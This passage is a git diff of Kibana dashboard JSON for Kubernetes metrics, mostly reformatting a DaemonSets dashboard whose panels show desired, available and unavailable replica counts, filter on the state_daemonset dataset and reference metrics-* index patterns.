"af47c34c-961a-463c-9d66-ffedcc2eef12:indexpattern-datasource-layer-380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "af47c34c-961a-463c-9d66-ffedcc2eef12:169f9d33-cf55-422e-906e-f4eecb26a362", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "303702e1-ba33-49f2-b337-4cc7d7305606:indexpattern-datasource-layer-77da5988-3f03-4e8f-b1e4-39a94d8bec07", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1604f0de-edd6-456e-8670-ab9b33988abb:indexpattern-datasource-layer-d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f8313a9d-ab58-448e-b183-75f914caf53f:metrics_f8313a9d-ab58-448e-b183-75f914caf53f_0_index_pattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": 
"1bd24fa1-319e-4cae-9d45-d821b06a8034:indexpattern-datasource-layer-f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "91a7ce56-6a49-4b7e-837f-31c184b48c09:indexpattern-datasource-layer-7c7c4b67-a2df-427f-abbd-635e5fa73a9c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "24a2f3ce-a762-4e5f-8794-ff67fc70a41d:indexpattern-datasource-layer-acbb7181-0ff2-4164-9761-8b2c430d6a68", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "e3c408a3-6515-4104-b764-888f39fa6185:indexpattern-datasource-layer-54af7a75-9eab-4746-b959-378d6bbb7cf6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_f53d0d21-4502-4dce-8004-017a92104040:optionsListDataView", - "type": "index-pattern" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "controlGroup_df56c430-83b1-436e-8b9c-fb027aaa29ca:optionsListDataView", - "type": "index-pattern" - } + "title": "Server error responses counter rate" + } ], - "type": "dashboard", - "updated_at": "2023-01-11T16:15:13.706Z", - "version": "WzM1MDAsMV0=" + "timeRestore": false, + "title": "[Metrics Kubernetes] Proxy", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd:metrics_ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f74e1a86-4370-4f65-a3b8-d92c9f25ff42:indexpattern-datasource-layer-5de1942f-e0a5-4ed8-86c0-972d57d62085", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 
"34de2f11-faf2-49e8-aada-98c2cd5eb266:indexpattern-datasource-layer-0b5eadf5-2a9c-49a2-b862-d317822adfd8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c3fee68f-01c6-49da-a759-2900b1cd15bf:metrics_c3fee68f-01c6-49da-a759-2900b1cd15bf_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "af47c34c-961a-463c-9d66-ffedcc2eef12:indexpattern-datasource-layer-380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "af47c34c-961a-463c-9d66-ffedcc2eef12:169f9d33-cf55-422e-906e-f4eecb26a362", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "303702e1-ba33-49f2-b337-4cc7d7305606:indexpattern-datasource-layer-77da5988-3f03-4e8f-b1e4-39a94d8bec07", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1604f0de-edd6-456e-8670-ab9b33988abb:indexpattern-datasource-layer-d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f8313a9d-ab58-448e-b183-75f914caf53f:metrics_f8313a9d-ab58-448e-b183-75f914caf53f_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1bd24fa1-319e-4cae-9d45-d821b06a8034:indexpattern-datasource-layer-f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "91a7ce56-6a49-4b7e-837f-31c184b48c09:indexpattern-datasource-layer-7c7c4b67-a2df-427f-abbd-635e5fa73a9c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "24a2f3ce-a762-4e5f-8794-ff67fc70a41d:indexpattern-datasource-layer-acbb7181-0ff2-4164-9761-8b2c430d6a68", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e3c408a3-6515-4104-b764-888f39fa6185:indexpattern-datasource-layer-54af7a75-9eab-4746-b959-378d6bbb7cf6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_f53d0d21-4502-4dce-8004-017a92104040:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 
"controlGroup_df56c430-83b1-436e-8b9c-fb027aaa29ca:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013.json b/packages/kubernetes/kibana/dashboard/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013.json index d066b5bf8c1..fa81a82e6bb 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013.json 
@@ -1,904 +1,912 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "twoLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"0e42fece-4a2f-4b80-a57d-89eeec3d0d29\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"0e42fece-4a2f-4b80-a57d-89eeec3d0d29\",\"enhancements\":{}}},\"cfe75517-e74e-43eb-9566-258234ad92e7\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"cfe75517-e74e-43eb-9566-258234ad92e7\",\"selectedOptions\":[],\"enhancements\":{}}},\"274480d2-d432-486c-bce5-e88caa3d6b7a\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.daemonset.name\",\"title\":\"DaemonSet Name\",\"id\":\"274480d2-d432-486c-bce5-e88caa3d6b7a\",\"selectedOptions\":[],\"enhancements\":{}}}}" - }, - "description": "Metrics about DaemonSets", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "id": "kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI0OSwyXQ==", + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "twoLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": 
"{\"0e42fece-4a2f-4b80-a57d-89eeec3d0d29\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"0e42fece-4a2f-4b80-a57d-89eeec3d0d29\",\"enhancements\":{}}},\"cfe75517-e74e-43eb-9566-258234ad92e7\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"cfe75517-e74e-43eb-9566-258234ad92e7\",\"selectedOptions\":[],\"enhancements\":{}}},\"274480d2-d432-486c-bce5-e88caa3d6b7a\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.daemonset.name\",\"title\":\"DaemonSet Name\",\"id\":\"274480d2-d432-486c-bce5-e88caa3d6b7a\",\"selectedOptions\":[],\"enhancements\":{}}}}" + }, + "description": "Metrics about DaemonSets", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes 
DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "syncCursor": true, - "syncTooltips": false, - "useMargins": true + "gridData": { + "h": 4, + "i": "573ec41e-ffc3-4c89-ba35-138bab599f07", + "w": 48, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes 
Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", - "openLinksInNewTab": false - }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 4, - "i": "573ec41e-ffc3-4c89-ba35-138bab599f07", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "573ec41e-ffc3-4c89-ba35-138bab599f07", - "title": "Kubernetes Dashboards [Metrics Kubernetes]", - "type": "visualization", - "version": "8.10.2" - }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-e3bc5ca2-71af-4901-ae1c-82e383f83ae9", - "type": "index-pattern" + "panelIndex": "573ec41e-ffc3-4c89-ba35-138bab599f07", + "title": "Kubernetes Dashboards [Metrics Kubernetes]", + "type": "visualization", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-e3bc5ca2-71af-4901-ae1c-82e383f83ae9", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d115572d-c1ae-4402-bd61-7f6aca621b17", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e3bc5ca2-71af-4901-ae1c-82e383f83ae9": { + "columnOrder": [ + "859d3534-c923-4005-a84a-158f079f7e62", + "e115f6a2-0a07-4712-ab16-e6bce3f17b2c" + ], + "columns": { + "859d3534-c923-4005-a84a-158f079f7e62": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.daemonset.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - 
"id": "metrics-*", - "name": "d115572d-c1ae-4402-bd61-7f6aca621b17", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "e3bc5ca2-71af-4901-ae1c-82e383f83ae9": { - "columnOrder": [ - "859d3534-c923-4005-a84a-158f079f7e62", - "e115f6a2-0a07-4712-ab16-e6bce3f17b2c" - ], - "columns": { - "859d3534-c923-4005-a84a-158f079f7e62": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.daemonset.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.daemonset.name" - }, - "e115f6a2-0a07-4712-ab16-e6bce3f17b2c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.daemonset.replicas.desired\": *" - }, - "isBucketed": false, - "label": "Replicas Available ", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.daemonset.replicas.desired" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "d115572d-c1ae-4402-bd61-7f6aca621b17", - "key": "data_stream.dataset", - "negate": false, - "params": { 
- "query": "kubernetes.state_daemonset" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_daemonset" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "859d3534-c923-4005-a84a-158f079f7e62", - "collapseFn": "sum", - "layerId": "e3bc5ca2-71af-4901-ae1c-82e383f83ae9", - "layerType": "data", - "metricAccessor": "e115f6a2-0a07-4712-ab16-e6bce3f17b2c" - } + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.daemonset.name" }, - "title": "DaemonSet Replicas Desired [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "e115f6a2-0a07-4712-ab16-e6bce3f17b2c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.daemonset.replicas.desired\": *" + }, + "isBucketed": false, + "label": "Replicas Available ", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.daemonset.replicas.desired" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "74f075ae-ea3e-40aa-a84c-2538a2195f6a", - "w": 12, - "x": 0, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "74f075ae-ea3e-40aa-a84c-2538a2195f6a", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "d115572d-c1ae-4402-bd61-7f6aca621b17", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_daemonset" + }, + "type": "phrase" + }, + 
"query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_daemonset" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "859d3534-c923-4005-a84a-158f079f7e62", + "collapseFn": "sum", + "layerId": "e3bc5ca2-71af-4901-ae1c-82e383f83ae9", + "layerType": "data", + "metricAccessor": "e115f6a2-0a07-4712-ab16-e6bce3f17b2c" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-65cba563-57d3-468a-93b9-f22de872b5ff", - "type": "index-pattern" + "title": "DaemonSet Replicas Desired [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "74f075ae-ea3e-40aa-a84c-2538a2195f6a", + "w": 12, + "x": 0, + "y": 4 + }, + "panelIndex": "74f075ae-ea3e-40aa-a84c-2538a2195f6a", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-65cba563-57d3-468a-93b9-f22de872b5ff", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9cc3aefb-f6ee-47ca-8e8b-a5e5e9f46a6a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "65cba563-57d3-468a-93b9-f22de872b5ff": { + "columnOrder": [ + "333417c9-f6ca-4afe-837c-f96891f37780", + "2318a210-3ab1-434b-8c1a-231a81856418" + ], + "columns": { + "2318a210-3ab1-434b-8c1a-231a81856418": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.daemonset.replicas.available\": *" + }, + "isBucketed": false, + "label": "Replicas Available", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", 
+ "sourceField": "kubernetes.daemonset.replicas.available" + }, + "333417c9-f6ca-4afe-837c-f96891f37780": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.daemonset.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "9cc3aefb-f6ee-47ca-8e8b-a5e5e9f46a6a", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "65cba563-57d3-468a-93b9-f22de872b5ff": { - "columnOrder": [ - "333417c9-f6ca-4afe-837c-f96891f37780", - "2318a210-3ab1-434b-8c1a-231a81856418" - ], - "columns": { - "2318a210-3ab1-434b-8c1a-231a81856418": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.daemonset.replicas.available\": *" - }, - "isBucketed": false, - "label": "Replicas Available", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.daemonset.replicas.available" - }, - "333417c9-f6ca-4afe-837c-f96891f37780": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.daemonset.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": 
"terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.daemonset.name" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "9cc3aefb-f6ee-47ca-8e8b-a5e5e9f46a6a", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_daemonset" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_daemonset" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "333417c9-f6ca-4afe-837c-f96891f37780", - "collapseFn": "sum", - "layerId": "65cba563-57d3-468a-93b9-f22de872b5ff", - "layerType": "data", - "metricAccessor": "2318a210-3ab1-434b-8c1a-231a81856418" - } - }, - "title": "DaemonSet Replicas Available [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.daemonset.name" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "2f904623-cc34-4a48-afce-46fff964dbdf", - "w": 12, - "x": 12, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "2f904623-cc34-4a48-afce-46fff964dbdf", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": 
"9cc3aefb-f6ee-47ca-8e8b-a5e5e9f46a6a", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_daemonset" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_daemonset" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "333417c9-f6ca-4afe-837c-f96891f37780", + "collapseFn": "sum", + "layerId": "65cba563-57d3-468a-93b9-f22de872b5ff", + "layerType": "data", + "metricAccessor": "2318a210-3ab1-434b-8c1a-231a81856418" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-bb896fbb-5e73-4bb9-922d-922562b1e71f", - "type": "index-pattern" + "title": "DaemonSet Replicas Available [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "2f904623-cc34-4a48-afce-46fff964dbdf", + "w": 12, + "x": 12, + "y": 4 + }, + "panelIndex": "2f904623-cc34-4a48-afce-46fff964dbdf", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-bb896fbb-5e73-4bb9-922d-922562b1e71f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1aacb9a8-18b0-46cb-a522-1cfac61e09ef", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "bb896fbb-5e73-4bb9-922d-922562b1e71f": { + "columnOrder": [ + "edebd4ce-012f-4677-ab82-cdb1e495c9b5", + "33e722b3-a080-438a-a3d9-83f6da23009a" + ], + "columns": { + "33e722b3-a080-438a-a3d9-83f6da23009a": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.daemonset.replicas.unavailable\": *" + }, + 
"isBucketed": false, + "label": "Replicas Unavailable ", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.daemonset.replicas.unavailable" + }, + "edebd4ce-012f-4677-ab82-cdb1e495c9b5": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.daemonset.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "1aacb9a8-18b0-46cb-a522-1cfac61e09ef", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "bb896fbb-5e73-4bb9-922d-922562b1e71f": { - "columnOrder": [ - "edebd4ce-012f-4677-ab82-cdb1e495c9b5", - "33e722b3-a080-438a-a3d9-83f6da23009a" - ], - "columns": { - "33e722b3-a080-438a-a3d9-83f6da23009a": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.daemonset.replicas.unavailable\": *" - }, - "isBucketed": false, - "label": "Replicas Unavailable ", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.daemonset.replicas.unavailable" - }, - "edebd4ce-012f-4677-ab82-cdb1e495c9b5": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.daemonset.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - 
"params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.daemonset.name" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "1aacb9a8-18b0-46cb-a522-1cfac61e09ef", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_daemonset" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_daemonset" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "edebd4ce-012f-4677-ab82-cdb1e495c9b5", - "collapseFn": "sum", - "layerId": "bb896fbb-5e73-4bb9-922d-922562b1e71f", - "layerType": "data", - "metricAccessor": "33e722b3-a080-438a-a3d9-83f6da23009a" - } - }, - "title": "DaemonSet Replicas Unavailable [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.daemonset.name" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "e39b7173-1acf-4b60-9500-caa97eb5fabb", 